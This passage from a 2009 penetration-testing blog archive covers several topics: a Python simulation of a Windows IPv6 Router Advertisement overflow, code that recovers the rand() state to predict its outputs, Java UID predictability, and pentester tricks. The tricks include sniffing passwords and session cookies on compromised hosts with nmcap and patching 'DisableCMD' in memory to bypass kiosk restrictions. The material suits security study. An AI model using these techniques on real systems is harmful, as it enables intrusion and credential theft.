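        lo, hi = max(start, base), min(end, base + len(frag))
        if lo < hi:
            out.append(frag[lo - base:hi - base])
        base += len(frag)
    return out


class Storage:
    """Stand-in for the fixed-size buffer the caller hands to NdisGetDataBuffer."""

    def __init__(self, capacity):
        self.capacity = capacity

    def fetch(self, pieces, bytes_needed):
        if len(pieces) == 1:                  # contiguous: returned by reference, nothing copied
            return pieces[0][:bytes_needed]
        if bytes_needed > self.capacity:      # non-contiguous: NDIS concatenates into Storage
            raise OverflowError("%d bytes into a %d-byte buffer" % (bytes_needed, self.capacity))
        return b"".join(pieces)[:bytes_needed]


def handle_prefix_info_vulnerable(pieces):
    """Pre-patch order: fetch first, compare the size to 0x20 afterwards."""
    needed = pieces[0][1] * 8                 # Length byte, assumed to sit in the first piece
    Storage(PREFIX_INFO_BYTES).fetch(pieces, needed)
    return "accepted" if needed == PREFIX_INFO_BYTES else "rejected"


def handle_prefix_info_patched(pieces):
    """Post-patch order: the size is compared to 0x20 before any data is fetched."""
    needed = pieces[0][1] * 8
    if needed != PREFIX_INFO_BYTES:
        return "rejected"
    Storage(PREFIX_INFO_BYTES).fetch(pieces, needed)
    return "accepted"


def process_ra(icmp, fragment_size, patched):
    """Receive the RA as IPv6 fragments (one buffer each) and run every Prefix
    Information option through the chosen handler: accepted / rejected / crashed."""
    fragments = [icmp[i:i + fragment_size] for i in range(0, len(icmp), fragment_size)]
    handler = handle_prefix_info_patched if patched else handle_prefix_info_vulnerable
    try:
        for otype, start, end in iter_nd_options(icmp):
            if otype == ND_OPT_PREFIX_INFORMATION and handler(pieces_of(fragments, start, end)) == "rejected":
                return "rejected"
        return "accepted"
    except OverflowError:
        return "crashed"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    ra = build_ra(build_prefix_info(255))      # same shape as the Scapy packet: 16 + 2040 bytes
    for patched in (False, True):
        print("patched" if patched else "vulnerable", process_ra(ra, 1452, patched))
```

Two things are worth noticing when running it: the oversized option only "crashes" the vulnerable handler when it is split across fragments (with a fragment size large enough to hold the whole packet, the data is contiguous, nothing is copied, and the late length check rejects it harmlessly), and the patched handler never touches the data before the 0x20 comparison, which is exactly the pre-test versus post-test difference seen in the diff.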
<br />
Now, is this ethical to release such a piece of information to the general public? Well, yes, considering the following mitigations:<br />
<ul><li>This affects only IPv6-enabled Windows Vista and Windows 2008 "R1" systems (but IPv6 is enabled by default).</li>
<li>Microsoft provided a patch a few weeks ago.</li>
<li>This could raise NDIS 6 developers' awareness.</li>
<li>"Some people" have been working on it for more than 1 year, so it should be considered "available" (if not public).</li>
<li>Since Router Advertisements are only honored when the IPv6 Hop Limit (the equivalent of the IPv4 TTL) is 255, i.e. the packet has not crossed any router, this attack works only on the local link and could not be used to wreak havoc on the Internet.</li>
<li>"/GS" has proved so far to be an effective mitigation against remote code execution through this flaw ("it is just a DoS"™) – not to mention kernel-mode ASLR.</li>
<li>This is a good Scapy + IPv6 use case.</li>
</ul>I might not say the same about other TCP/IP flaws that were fixed in this patch, such as the Selective Acknowledgement one …<br />
<br />
Mandatory greetz: <a href="http://natisbad.org/">Arnaud Ebalard</a> (of Scapy6 fame) and <a href="http://droids-corp.org/~serpilliere/">Fabrice Desclaux</a> (of Rr0d fame).newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com8tag:blogger.com,1999:blog-26480225.post-73298735223850732052009-09-11T08:00:00.002+01:002009-09-11T08:00:00.453+01:00Unique is not Random is not Secure<i>Unique</i>, <i>Random </i>and <i>Secure </i>are three (very) different concepts. Misunderstanding those concepts could lead to severe security issues, as related in this story. However, I had to remove names from the (not so) innocent applications that were harmed :) <div><br /></div><div>Unique values are needed everywhere in modern computing: ActiveX GUIDs, HTTP session cookies, ... However, while some of those values have no identified security impact (e.g. ActiveX GUIDs), others must meet very strong security properties (e.g. HTTP session cookies).</div><div><br /></div><div>An attacker should at least not be able to guess some or all values that have been or will be generated. A stronger property is the inability for the attacker to guess past or future values, even if he has access to a subset of generated values at some point.</div><div><div><br /></div><div>Let's take a "uniqueness generator" that returns an integer value (whatever the size of that integer). How unique can this value be?</div><div><br /></div><div><b><span class="Apple-style-span" style="font-size:large;">Unique values</span></b></div><div><br /></div><div>The value is <i>unique</i> if two successive calls to the same function are guaranteed not to yield the same result.</div><div><br /></div><div>This property is very easy to achieve, either through a monotonic counter (0, 1, 2, 3 ...) or a timestamp. But those generators do not meet even the lowest security requirements formulated before: they are very easy to predict at any time. 
Fortunately, "cookie value == timestamp" disappeared from the Internet years ago.</div><div><br /></div><div>Some better generators exist, such as <a href="http://fr.wikipedia.org/wiki/Globally_Unique_Identifier">GUID</a> and <a href="http://fr.wikipedia.org/wiki/Universal_Unique_Identifier">UUID</a>. Older GUID generators were based on MAC address and timestamp, therefore having far fewer possible outputs than the entire value space. Recent GUID generators are based on cryptographically sound random generators (see below).</div><div><br /></div><div><div>Of course, there are limits to "uniqueness": at least the size of the output value. Everything stored on 32 bits will be easy to brute-force, even if it comes out of a 160-bit hashing algorithm. Moreover, values can be unique to a given computer only, a given process, or even a given thread.</div></div><div><br /></div><div><b><span class="Apple-style-span" style="font-size:large;">Random values</span></b></div><div><br /></div><div>For security-related tasks, it is often critical to use non-predictable unique generators. Therefore most people began to think "unique == random".</div><div><br /></div><div>However, true randomness is very difficult to achieve (as <a href="http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/">PHP knows</a>).</div><div><br /></div><div>The simplest random generator is the <a href="http://en.wikipedia.org/wiki/Linear_congruential_generator">Linear Congruential generator</a>. All values are correlated through the following formula: x<sub>n+1</sub> = A * x<sub>n</sub> + B (mod N), where A, B and N are fixed values.</div><div><br /></div><div>On Windows, the <a href="http://msdn.microsoft.com/en-us/library/398ax69y(VS.71).aspx">rand()</a> function of MSVCRT.DLL uses the following parameters:</div><div>A = 214013</div><div>B = 2531011</div><div>N = 2<sup>32</sup></div><div></div><div>Internal state is maintained on 32 bits. 
However, only the upper 16 bits of the state are returned as a result, masked with 0x7fff (so 15 bits survive). Therefore, rand() produces values between 0 and <a href="http://msdn.microsoft.com/en-us/library/2dfe3bzd(VS.71).aspx">RAND_MAX</a>, which has a hardcoded value of 0x7fff = 2<sup>15</sup> - 1.</div><div><br /></div><div>This is confirmed on Windows Seven 64-bit as seen below.</div><div><br /></div><div><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/rand.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 230px; DISPLAY: block; HEIGHT: 332px; CURSOR: hand" border="0" alt="" src="http://newsoft.dyndns.org/tech/rand.png" /></a></div><div>Therefore, the odds of guessing a rand() output in a single shot are 1 in 2<sup>15</sup>, which is already bad (as <a href="http://blogs.technet.com/srd/archive/2008/04/09/ms08-020-how-predictable-is-the-dns-transaction-id.aspx">DNS knows</a>).</div><div><br /></div><div>But finding out the rand() internal state (which is trivial with a few known output values: only the 16 hidden low bits have to be brute-forced) could prove far more catastrophic, since every past and future output then follows. In fact, rand() should never be used for anything security-related - it is mostly there for compatibility reasons. Good Windows applications make use of <a href="http://msdn.microsoft.com/en-us/library/aa379942(VS.85).aspx">CryptGenRandom()</a>.</div><div></div><div> </div><div>Out of curiosity, I also had a look at the <a href="http://www.gnu.org/software/libc/">GNU libc</a>. 
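Before turning to glibc, here is an added example (not part of the original post) that makes the "trivial with a few known output values" claim concrete. It models the MSVCRT rand() LCG with the parameters quoted above (A = 214013, B = 2531011, N = 2<sup>32</sup>, output = upper 16 bits of the state masked with 0x7fff), recovers the hidden state from three consecutive outputs by brute-forcing the 16 low bits, and predicts the outputs that follow. The <code>Lcg</code> class and the recovery routine are this example's own code, not Microsoft's or glibc's; the glibc "type 0" parameters are included only to show that with 31 bits exposed there is nothing left to brute-force.

```python
"""Added example, not from the original post: recover the hidden state of the
MSVCRT rand() LCG from a few consecutive outputs and predict what comes next.
The parameters are the ones quoted above (A = 214013, B = 2531011, N = 2^32,
output = upper 16 bits of the state masked with 0x7fff); the Lcg class and the
recovery routine are this example's own, not Microsoft's or glibc's code."""
from dataclasses import dataclass

MOD = 1 << 32


@dataclass(frozen=True)
class Lcg:
    a: int
    b: int
    hidden_bits: int   # low state bits that never reach the caller
    out_mask: int      # mask applied to the remaining bits

    def step(self, state):
        return (self.a * state + self.b) % MOD

    def output(self, state):
        return (state >> self.hidden_bits) & self.out_mask

    def sequence(self, seed, n):
        """Outputs of n successive calls after srand(seed)."""
        outs, state = [], seed % MOD
        for _ in range(n):
            state = self.step(state)
            outs.append(self.output(state))
        return outs


MSVCRT = Lcg(a=214013, b=2531011, hidden_bits=16, out_mask=0x7FFF)
GLIBC_TYPE0 = Lcg(a=1103515245, b=12345, hidden_bits=0, out_mask=0x7FFFFFFF)


def recover_states(lcg, observed):
    """Every state (with bit 31 cleared) that reproduces the observed outputs.
    Only the hidden low bits need brute force: bit 31 never influences bits 0..30
    of any later state (a is odd, so it only feeds back into bit 31) and it is
    masked out of the output, so it is irrelevant for prediction."""
    candidates = []
    for low in range(1 << lcg.hidden_bits):
        state = (observed[0] << lcg.hidden_bits) | low
        s, ok = state, True
        for o in observed[1:]:
            s = lcg.step(s)
            if lcg.output(s) != o:
                ok = False
                break
        if ok:
            candidates.append(state)
    return candidates


def predict(lcg, observed, n):
    """All possible continuations of length n, one per candidate state."""
    futures = []
    for state in recover_states(lcg, observed):
        s = state
        for _ in range(len(observed) - 1):   # advance to the last observed output
            s = lcg.step(s)
        future = []
        for _ in range(n):
            s = lcg.step(s)
            future.append(lcg.output(s))
        futures.append(future)
    return futures


if __name__ == "__main__":
    seen = MSVCRT.sequence(0xDEADBEEF, 8)
    print("observed:", seen[:3])
    print("predicted:", predict(MSVCRT, seen[:3], 5))
    print("actual:   ", seen[3:])
```

The brute force is 2<sup>16</sup> candidates at most, each checked against two further outputs (30 bits of constraint), so in practice a single candidate survives and the whole future of the generator is known; for glibc "type 0" the loop runs exactly once, because the first output already is the state.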
It turned out that rand() has several implementations, the most basic of which (referred to as "type 0") is a Linear Congruential generator with the following parameters:</div><div>A = 1103515245<br />B = 12345<br />N = 2<sup>32</sup></div><div>RAND_MAX = 2<sup>31</sup> - 1</div><div> </div><div>Here the output is simply the state masked to 31 bits, so handing this generator's output to a client as an int or unsigned int immediately leaks the whole internal generator state: one observed value is enough to predict every following one.</div><div> </div><div>Newer implementations (the default "type 3") use an additive feedback generator, a <a href="http://en.wikipedia.org/wiki/LFSR">Linear Feedback Shift Register</a> over 32-bit words with a much longer period; it is better than an LCG but still not cryptographically strong, and still predictable from a run of consecutive outputs.</div><div> </div><div><span class="Apple-style-span" style="font-size:large;"><b>Secure values</b></span></div><div><br /></div><div>As we saw earlier, random does not always mean secure. But even if the developer used a cryptographically strong random generator, it can still fall prey to implementation mistakes.</div><div><br /></div><div>One recent example I had is the (Sun-provided) <a href="http://java.sun.com/j2se/1.4.2/docs/api/java/rmi/server/UID.html">java.rmi.server.UID</a> class. Each word is important:</div><div><blockquote>"A UID represents an identifier that is unique over time with respect to the host it is generated on, or one of 2<sup>16</sup> "well-known" identifiers. (...) A UID instance contains three primitive values:</blockquote><blockquote><blockquote><i>unique</i>, an int that uniquely identifies the VM that this UID was generated in, with respect to its host and at the time represented by the time value (an example implementation of the unique value would be a process identifier), or zero for a well-known UID</blockquote><blockquote><i>time</i>, a long equal to a time (as returned by System.currentTimeMillis()) at which the VM that this UID was generated in was alive, or zero for a well-known UID</blockquote><blockquote><i>count</i>, a short to distinguish UIDs generated in the same VM with the same time value"</blockquote></blockquote></div><div>So, secure or not? Hard to tell from the documentation ... 
Let's run the following code sample:</div><div><br /></div><div><pre>package uidtest;

import java.rmi.server.UID;

public class Main {
    public static void main(String[] args) {
        // Five UIDs generated back to back in the same VM
        for (int i = 0; i < 5; i++) {
            UID u = new UID();
            System.out.println(u);
        }
    }
}</pre></div><div><br /></div><div><pre>$ javac -d . Main.java
$ java uidtest.Main

-8241e54:12334a437e6:-8000
-8241e54:12334a437e6:-7fff
-8241e54:12334a437e6:-7ffe
-8241e54:12334a437e6:-7ffd
-8241e54:12334a437e6:-7ffc</pre></div><div><br /></div><div>So, it appears that <i>this UID generator is a simple monotonic counter</i>: the first two fields stay constant, and only the last one moves, by one at a time.</div><div><br /></div><div>Since the <a href="http://openjdk.java.net/">Sun JDK</a> has been open-sourced, it is possible to have a deeper look at the implementation:</div><div><br /></div><div><pre>public UID() {
    synchronized (lock) {
        if (!hostUniqueSet) {
            hostUnique = (new SecureRandom()).nextInt();
            hostUniqueSet = true;
        }
        unique = hostUnique;
        if (lastCount == Short.MAX_VALUE) {
            boolean interrupted = Thread.interrupted();
            boolean done = false;
            while (!done) {
                long now = System.currentTimeMillis();
                if (now <= lastTime) {
                    // wait for time to change
                    try {
                        Thread.currentThread().sleep(1);
                    } catch (InterruptedException e) {
                        interrupted = true;
                    }
                } else {
                    lastTime = now;
                    lastCount = Short.MIN_VALUE;
                    done = true;
                }
            }
            if (interrupted) {
                Thread.currentThread().interrupt();
            }
        }
        time = lastTime;
        count = lastCount++;
    }
}</pre></div><div><br /></div><div>First field is initialized with SecureRandom() ... once per process.</div><div><br /></div><div>Second field is the time in milliseconds. It only changes when all possible values of the third field have been exhausted.</div><div><br /></div><div>Third field is a monotonic 16-bit counter.</div><div><br /></div><div>Conclusion: you should not rely on the Java UID class for <i>secure </i>UID generation!</div></div>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com1tag:blogger.com,1999:blog-26480225.post-41040141406395877242009-08-28T08:00:00.002+01:002009-08-28T08:00:06.185+01:00Pentester trick #9: exchanging files through RDP (without getting owned)<div>Remote access to the target system is sometimes limited to the <a href="http://en.wikipedia.org/wiki/Remote_Desktop_Protocol">RDP protocol</a> only (either <i>Remote Desktop</i> or <i>Terminal Server</i> access).</div><div><br /></div><div>This is often the case with heavily firewalled systems, such as branch office servers exposed on the Internet with only port TCP/3389 open.</div><div><br /></div><div>Previously gathered credentials might have allowed the pentester to break into such a system. However, how to get further without being able to access the Internet from the target?</div><div><br /></div><div>Locally available utilities (such as the <b><span class="Apple-style-span" style="font-family:'courier new';">NET</span></b> command, VBScript-ing and the like) are invaluable in this case. 
But what about hardcore, <a href="http://www.ivanlef0u.tuxfamily.org/?p=173">process-injecting utilities</a> ?</div><div><br /></div><div>A pretty well-known trick in this case is the ability to mount through the RDP protocol many client-side resources, such as <i>printers </i>(NOT recommended), <i>clipboard </i>and ... <i>hard drives</i>.</div><div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/mstsc1.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 411px; height: 471px;" src="http://newsoft.dyndns.org/tech/mstsc1.png" border="0" alt="" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/mstsc2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 419px; height: 435px;" src="http://newsoft.dyndns.org/tech/mstsc2.png" border="0" alt="" /></a><br /></div><div>At this point, the novice pentester got his C drive mounted on the remote server, and all his utilities wiped out by server antivirus.</div><div><br /></div><div>Now it is time to call upon the forgotten lore of MS-DOS, namely the SUBST command which is still available on Windows XP SP3.</div><div><br /></div><div>After having created a C:\TAZ directory on his laptop, the experienced pentester types at the CMD console prompt:</div><div><br /></div><div><b><span class="Apple-style-span" style="font-family:'courier new';"><span class="Apple-style-span" style="font-size:medium;">SUBST D: C:\TAZ</span></span></b></div><div><br /></div><div>... 
and is now able to exchange files with the remote target through a virtual "D:" drive, without getting owned.</div><div><br /></div><div>Having compromised the remote network beyond hope, he now types:</div><div><br /></div><div><b><span class="Apple-style-span" style="font-family:'courier new';">SUBST D: /D</span></b></div><div><br /></div><div>... and might have finished the assessment report by 5:00 PM, if he is wise enough NOT to use LaTeX.</div>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com5tag:blogger.com,1999:blog-26480225.post-72869660657926200732009-08-14T14:00:00.003+01:002009-08-15T07:10:01.971+01:00Pentester trick #8: command-line sniffing made easy<div><i>(Preamble: this post applies to the Windows operating system only. Linux has <a href="http://www.tcpdump.org/tcpdump_man.html">tcpdump</a>, Solaris has <a href="http://docs.sun.com/app/docs/doc/819-2240/snoop-1m?a=view">snoop</a>, etc.)</i></div><div><br /></div><div>Sometimes sniffing the network from a compromised remote target might come in handy.</div><div><br /></div><div>For instance, it proved useful to me in the following pentest cases:</div><div><ul><li>Recovering POP/IMAP/SMTP passwords, when <a href="http://www.nirsoft.net/utils/mailpv.html">classical tools</a> are blocked by antivirus software (use of POP<b>S</b>/IMAP<b>S</b>/SMTP<b>S</b> is still not widespread, especially on enterprise LANs).</li><li>Gathering HTTP session cookies or even passwords.</li></ul></div><div>But sometimes you have only command-line access to the remote target (through <a href="http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx">PSEXEC</a>, <a href="http://metasploit.org/">Metasploit</a> and such).</div><div><br /></div><div>Getting access to the GUI (through <a href="http://www.realvnc.com/">VNC</a>, <a href="http://en.wikipedia.org/wiki/Remote_Desktop_Protocol">Remote Desktop</a> or <a href="http://www.dameware.com/downloads/">DameWare Mini Remote Control</a>) is not practical, 
since the targeted user is actively working on the console (there are workarounds for this situation, but I am not going to discuss them right now).</div><div><br /></div><div>Installing network sniffing software, such as <a href="http://www.wireshark.org/">WireShark</a>/<a href="http://www.winpcap.org/">Winpcap</a>, is not practical because you have to set up the software (which changes the target system configuration) and you might end up rebooting the system. Not to mention the x64 case, which requires signed drivers (the latest x64 Winpcap drivers are signed, though).</div><div><br /></div><div>A lot of people claim to offer "rebootless <a href="http://www.google.fr/search?q=command+line+sniffer">command line sniffers</a>", but they are often unmaintained proof-of-concept tools, and professional pentesters cannot afford to crash a remote target.</div><div><br /></div><div>The most reliable and lightweight tool I know is ... the one made by Microsoft, a.k.a. <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=983b941d-06cb-4658-b7f6-3088333d062f&displaylang=en">Microsoft Network Monitor</a>. It relies on Windows built-in packet capture features, therefore leaving a minimal footprint on the target system. It can run without installation. 
It works on all Microsoft-supported Windows versions, in x86, x64 and even IA64 flavors.</div><div><br /></div><div>How to use it ?</div><div><ol><li>Download and install Microsoft Network Monitor on a standalone computer.</li><li>Upload <b><span class="Apple-style-span" style="font-family:'courier new';">nmconfig.exe</span></b> and <b><span class="Apple-style-span" style="font-family:'courier new';">nmcap.exe</span></b> on the target computer.</li><li>Enable the Microsoft Network Monitor Driver: <b><span class="Apple-style-span" style="font-family:'courier new';">nmconfig /install</span></b></li><li>Test: <b><span class="Apple-style-span" style="font-family:'courier new';">nmcap /displaynetworks</span></b> </li><li>Sniff all TCP traffic on every local interface: <span class="Apple-style-span" style=" font-weight: bold; font-family:'courier new';">nmcap /network * /capture tcp /File tcp.cap</span></li><li><span class="Apple-style-span" style=" font-weight: bold; font-family:'courier new';"><span class="Apple-style-span" style=" font-weight: normal; font-family:Georgia;">Disable the Microsoft Network Monitor Driver: <b><span class="Apple-style-span" style="font-family:'courier new';">nmconfig /uninstall</span></b></span></span></li></ol></div><div><i>(Caveat: the capture file format is not Winpcap-compatible. 
However, Wireshark (and others) know how to read it.)</i></div>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-61086980714450122042009-05-27T21:03:00.003+01:002009-05-27T21:18:43.747+01:00There is no Notepad trick<div>You might have heard that Notepad will fail to display correctly a file holding this single line: "<a href="http://digg.com/software/_this_app_can_break_Are_there_any_other_forbidden_strings_in_Notepad_">this app can break</a>" (or any sentence built on the same 4/3/3/5 scheme).</div><div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/test1_before.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 240px; height: 78px;" src="http://newsoft.dyndns.org/tech/test1_before.png" border="0" alt="" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/test1_after.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 240px; height: 77px;" src="http://newsoft.dyndns.org/tech/test1_after.png" border="0" alt="" /></a><br /></div><div>This issue could be tracked down to ANSI vs. Unicode text autodetection.</div><div><br /></div><div>However, there is a much cooler Notepad trick in the latest issue of <a href="http://www.2600.com/">2600 magazine</a>. If the first text line happens to be ".LOG", Notepad will automatically append last modification time at the end of the file (as documented in <a href="http://support.microsoft.com/kb/81067">KB81067</a>). 
This feature is available from Windows 2.03.</div><div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/test2_before.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 244px; height: 150px;" src="http://newsoft.dyndns.org/tech/test2_before.png" border="0" alt="" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/test2_after.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 244px; height: 150px;" src="http://newsoft.dyndns.org/tech/test2_after.png" border="0" alt="" /></a><br /></div>This is not a pentester's trick by itself. But I still love it :)newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-48827667695949943812009-01-19T09:00:00.000+01:002009-01-19T09:00:01.385+01:00Pentester trick #7: re-enabling CMD & REGEDITThere are 2 settings that are commonly used by system administrators in "restricted", kiosk-like environments: <a href="http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/regentry/93465.mspx?mfr=true">DisableCMD</a> and <a href="http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/regentry/93466.mspx?mfr=true">DisableRegistryTools</a>, which are both to be found under:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System</span></span><br /><br />As their names imply, those settings disable the use of CMD.EXE and REGEDIT.EXE.<br /><br />Those settings are enforced by CMD and REGEDIT themselves. Therefore, alternatives such as <a href="http://sourceforge.net/projects/console/">Console</a> and <a href="http://www.torchsoft.com/en/rw_information.html">Registry Workshop</a> will still run fine. 
However, it might not always be handy to bring new applications on the target system. So, how do we recover CMD and REGEDIT applications locally ?<br /><br />It would be easy to find binary checks inside both applications and to patch them, but a good pentester is lazier than that.<br /><br />After making a copy of both applications, it is enough to replace a single character within "DisableCMD" or "DisableRegistryTools" strings. I really love those stupid tricks :) The question is "how ?" ... and surprisingly, the answer is not obvious.<br /><ul><li>DEBUG/EDLIN: they won't handle files over 64KB.</li><li>".COM" application written in pure assembly using DEBUG: cool, but a bit tedious.<br /></li><li>QBASIC application: there is no QBASIC shipped with Windows any more :(<br /></li><li>Notepad/Wordpad: they mess up binary files on write back.</li><li>VBScript: is poor at handling binary files.</li><li>VBA inside an Office application: cool, but you need to have Office installed beforehand.</li><li>NTSD: does not support the <a href="http://www.dumpanalysis.org/blog/index.php/2008/04/15/windbg-as-a-binary-editor/">.readmem/.writemem</a> commands.<br /></li></ul>In most cases, the best course of action is to run CMD inside NTSD (hint: you can drag-and-drop CMD over NTSD, which is sometimes handy in very restricted "kiosk" modes):<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">C:\> ntsd cmd.exe</span><br /><span style="font-family:courier new;">(...)</span><br /><span style="font-family:courier new;">0:000> lm</span><br /><span style="font-family:courier new;">start end module name</span><br /><span style="font-family:courier new;">4ad00000 4ad64000 cmd (deferred)</span><br /><span style="font-family:courier new;">77be0000 77c38000 msvcrt (deferred)</span><br /><span style="font-family:courier new;">77ef0000 77f37000 gdi32 (deferred)</span><br /><span style="font-family:courier new;">7c800000 7c905000 kernel32 (deferred)</span><br /><span 
style="font-family:courier new;">7c910000 7c9c7000 ntdll (export symbols) ntdll.dll</span><br /><span style="font-family:courier new;">7e390000 7e420000 user32 (deferred)<br /><br /></span><span style="font-family:courier new;">0:000> s 4ad00000 L 64000 44 00 69 00 73 00 61 00 62 00 6C 00 65 00 43 00 4D 00</span><br /><span style="font-family:courier new;"><br />4ad14944 44 00 69 00 73 00 61 00-62 00 6c 00 65 00 43 00 D.i.s.a.b.l.e.C.</span><br /><span style="font-family:courier new;"><br />0:000> e 4ad14944 41</span><br /><span style="font-family:courier new;"><br />0:000> g</span><br /><span style="font-family:courier new;">(...)</span><br /><span style="font-family:courier new;">Microsoft Windows XP [version 5.1.2600]</span><br /><span style="font-family:courier new;">(C) Copyright 1985-2001 Microsoft Corp.</span><br /><br /><span style="font-family:courier new;">C:\temp></span></span><br /><br />I'll be glad if someone comes with another solution :)<br /><br />Note: surprisingly, the "DisableCMD" string lies within the code (".text") section.<br /><br />Note for kiosk designers: to prevent users from running arbitrary applications, <a href="http://technet.microsoft.com/en-us/library/bb457006.aspx">Software Restriction Policies</a> would scale more easily.newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com15tag:blogger.com,1999:blog-26480225.post-31441405585851695892009-01-05T09:00:00.002+01:002009-01-05T09:00:03.824+01:00Lessons learned from MS08-005<span style="font-size:85%;"><span style="font-style: italic;">[ This post has been 80% complete for 1 year. 
And I swear I will clean up my "todo list" in 2009 :) ]</span><br /></span><br /><a href="http://www.microsoft.com/technet/security/Bulletin/MS08-005.mspx">MS08-005</a> (KB 942831) is a local privilege escalation bug affecting:<br /><ul><li>IIS 5.0 (Windows 2000)</li><li>IIS 5.1 (Windows XP)</li><li>IIS 6.0 (Windows 2003)</li><li>IIS 7.0 (Vista)</li></ul>This particular bug caught my attention for several reasons:<br /><ul><li>Local bugs tend to be more easily and reliably exploitable ;</li><li>The bugfix is very small in size ;</li><li>This bug made its way into Vista, despite manual and automated code analysis.</li></ul>Let's play with the Windows XP SP2 version of this bug!<br /><br /><span style="font-size:130%;"> <span style="font-weight: bold;">BinDiff-ing</span></span><br /><br />The first step is to install the patch, and to recover the backed-up files. In our case, there is only 1 file (<span style="font-size:85%;"><span style="font-family:courier new;">infocomm.dll</span></span>), which can be found in:<br /><span style="font-size:85%;"><span style="font-family:courier new;">C:\windows\$NtUninstallKB942831$</span></span><br /><br />The second step is to diff the original and patched files. If you happen to have a legit <a href="http://www.hex-rays.com/">IDA Pro</a> copy, Tenable <a href="http://cgi.tenablesecurity.com/tenable/patchdiff.php">PatchDiff2</a> is the best free plugin available out there. Otherwise, you'll have to fall back on <a href="http://research.eeye.com/html/tools/RT20060801-1.html">eEye Binary Diffing Suite</a>. 
Screenshots below are taken from <a href="http://www.zynamics.com/">BinDiff2</a>.<br /><br />Only 2 functions were modified by the patch:<br /><span style="font-size:85%;"><span style="font-family:courier new;">int __stdcall CVRootDirMonitorEntry::FileChanged(char *lpString2, int)</span> <span style="font-family:courier new;">int __thiscall CVRootDirMonitorEntry::ActOnNotification(unsigned long, unsigned long)</span></span><br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Understanding the change</span> </span><br /><br />We will focus on <span style=";font-family:courier new;font-size:85%;" >FileChanged()</span> function, in which <span style="font-size:85%;"><span style="font-family:courier new;">strlen()</span></span>/<span style="font-size:85%;"><span style="font-family:courier new;">strcpy()</span></span> operations were fixed (as shown in the graph below). Note: both APIs were inlined.<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/diff_FileChanged.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/diff_FileChanged.png" alt="" border="0" /></a><br />Code changes can also be spotted using the excellent <a href="http://www.hex-rays.com/">Hex-Rays</a> decompilation plugin.<br /><br />Unpatched version:<br /><br /><span style="background: white none repeat scroll 0% 50%; white-space: pre; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;font-family:FixedSys;color:blue;" ><span style="color:navy;"> if ( </span>_strchr<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">'~'</span><span style="color:navy;">) )<br />{<br /></span><span style="color: rgb(128, 128, 255);">result </span><span 
style="color:navy;">= </span>ConvertToLongFileName<span style="color:navy;">(*((</span><span style="color:gray;">char **</span><span style="color:navy;">)</span><span style="color: rgb(128, 128, 255);">long_filename </span><span style="color:navy;">+ 3), </span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">, &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">);<br />if ( !</span><span style="color: rgb(128, 128, 255);">result </span><span style="color:navy;">)<br />return </span><span style="color: rgb(128, 128, 255);">result</span><span style="color:navy;">;<br /></span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">= </span>_strrchr<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">'\\'</span><span style="color:navy;">);<br />if ( </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">)<br />{<br /></span><span style="color: rgb(128, 128, 255);">v9 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">;<br /></span><span style="color: rgb(128, 128, 255);">v15 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">input_filename </span><span style="color:navy;">+ 1;<br /></span><span style="color: rgb(128, 128, 255);">v16 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v7 </span><span 